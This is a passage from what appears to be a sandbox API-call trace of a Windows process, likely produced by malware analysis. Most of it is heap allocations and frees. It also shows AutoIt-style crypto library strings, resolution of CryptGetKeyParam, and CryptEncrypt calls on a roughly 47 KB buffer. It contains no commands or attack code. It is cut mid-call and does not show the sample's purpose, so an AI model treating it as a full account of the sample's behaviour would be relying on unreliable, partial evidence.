(HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0118.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0118.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0118.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0118.057] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0118.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0118.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0118.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0118.057] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0118.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0118.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0118.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0118.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0118.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0118.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0118.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0118.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0118.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0118.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0118.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0118.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0118.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0118.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0118.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0118.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0118.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0118.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0118.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0118.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0118.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0118.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0118.061] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0118.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0118.061] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e2530, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2530*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0118.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.063] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0118.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0118.064] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0118.064] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0118.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0118.065] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0118.065] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.065] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0118.065] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0118.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca9e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0118.065] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xb9fc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xba00) returned 1 [0118.065] CharLowerBuffW (in: lpsz="byte[47617]", cchLength=0xb | out: lpsz="byte[47617]") returned 0xb [0118.067] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.067] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0118.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cabe0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0118.067] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4538e28*, pdwDataLen=0x144e538*=0xb9fc, dwBufLen=0xba00 | out: pbData=0x4538e28*, pdwDataLen=0x144e538*=0xba00) returned 1 [0118.068] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", 